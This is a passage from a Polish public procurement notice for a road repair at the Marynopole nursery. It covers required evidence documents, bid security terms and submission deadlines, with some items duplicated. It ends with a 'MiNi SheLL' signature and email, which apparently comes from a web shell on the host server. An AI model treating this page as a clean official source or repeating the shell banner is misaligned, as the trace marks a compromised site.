lub KRUS albo inny dok. potwierdzający, że wyk. nie zalega z opłacaniem<br/>składek na ubezpieczenia społ. lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż 3 mies. przed jego<br/>złożeniem, a w przypadku zalegania<br/>z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz<br/>z zaświadcz. albo innym dok. potwierdzające, że przed upływem terminu składania ofert Wyk. dok. płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące poroz. w sprawie spłat tych należności,<br/>i) odpis lub informacje z Krajowego Rejestru Sądowego lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4) PZP, sporz. nie wcześniej niż 3<br/>mies. przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>j) oświadcz. Wyk. o aktualności inf. zawartych w oświadcz., o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z<br/>postępowania-zał 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)Wyk. o którym mowa w art.125 ust.1 PZP potwierdz. brak podstaw wykluczenia i spełnienie warunków udziału w postępowania (zał nr 3 do<br/>SWZ)<br/>b) wykaz robót bud. wyk. nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podm., na rzecz których roboty te zostały wykonane<br/>(wzór wykazu wykonanych robót budowlanych stanowi<br/>zał nr 4 do SWZ).<br/>c) dowody, że wskazane przez Wyk. rob.bud. na potwierdz. spełnienia warunku udziału w postępowaniu dot. zdolności tech. lub<br/>zawod. w zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dok.<br/>sporz. przez podmiot,<br/>na rzecz którego rob. bud. zostały wykonane, a jeżeli Wyk.<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dok. – inne odpowiednie dok.<br/>d) wykaz osób, skierowanych przez Wyk. do realizacji zam. publiczn.,<br/>w szczególności odp. za kierowanie rob. bud., wraz z inf. i na temat ich kwalifikacji zawod., posiadanych uprawnień, doświadczenia i<br/>wykształcenia, niezbędnych do wykonania zam. publ. a także zakresu wyk. przez nie czynności oraz inf. o podstawie do<br/>dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia stanowi zał nr 5 do SWZ),<br/>e) inf. z KRK w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zam. publiczne tytułem środka karnego - sporządzoną nie wcześniej niż 6 mies. przed jej złożeniem,<br/>f) oświadczenie Wyk., w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021 poz. 275 ), z innym Wyk., który złożył<br/>odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitał. wraz z dok. lub inf. potw.<br/>przygotowanie oferty lub oferty częściowej niezależnie od innego Wyk. należącego do tej samej grupy kapitał. - (wzór oświadczenia<br/>Wyk. w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi zał nr 6 do<br/>SWZ),<br/>g) zaświadcz. właśc. naczelnika urzędu skarbowego potwierdz.,<br/>że Wyk. nie zalega z opłacaniem podatków i opłat, w zakresie art. 109<br/>ust.pkt 1) PZP, wyst. nie wcześniej niż 3 mies. przed jego złożeniem,<br/>a w przypadku zalegania z opłaceniem podatków i opłat wraz z zaświadcz.<br/>dok. potwierdzające, że przed upływem terminu składania ofert Wyk. dokonał płatności należnych podatków wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>h) zaświadcz. właściwej terenowej jednostki org. ZUS lub KRUS albo inny dok. potwierdzający, że wyk. nie zalega z opłacaniem<br/>składek na ubezpieczenia społ. lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż 3 mies. przed jego<br/>złożeniem, a w przypadku zalegania<br/>z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz<br/>z zaświadcz. albo innym dok. potwierdzające, że przed upływem terminu składania ofert Wyk. dok. płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące poroz. w sprawie spłat tych należności,<br/>i) odpis lub informacje z Krajowego Rejestru Sądowego lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4) PZP, sporz. nie wcześniej niż 3<br/>mies. przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>j) oświadcz. Wyk. o aktualności inf. zawartych w oświadcz., o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z<br/>postępowania-zał 7 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości;<br/>– 5 200,00 zł (słownie: pięć tysięcy dwieście 00/100 zł).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt.<br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>-19-<br/>3. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego BOŚ SA Centrum Biznesowe Lublin nr: 89 1540 1144 2114 0662<br/>6591 0001 z dopiskiem: „Remont drogi wewnętrznej nr 220/916 na terenie szkółki<br/>Marynopole” .<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie<br/>zaliczone na rachunku bankowym Zamawiającego.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej<br/>lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie<br/>zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do<br/>wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98<br/>ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt<br/>2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej, tj. opatrzonej kwalifikowanym podpisem elektronicznym osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres<br/>związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w<br/>sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu<br/>terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa<br/>w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust.<br/>1 pkt 14 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem<br/>– określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo<br/>i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie<br/>Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia umowy zawarto we wzorze umowy paragraf 17 , który stanowi załącznik nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektronicznie za pośrednictwem Platformy, pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com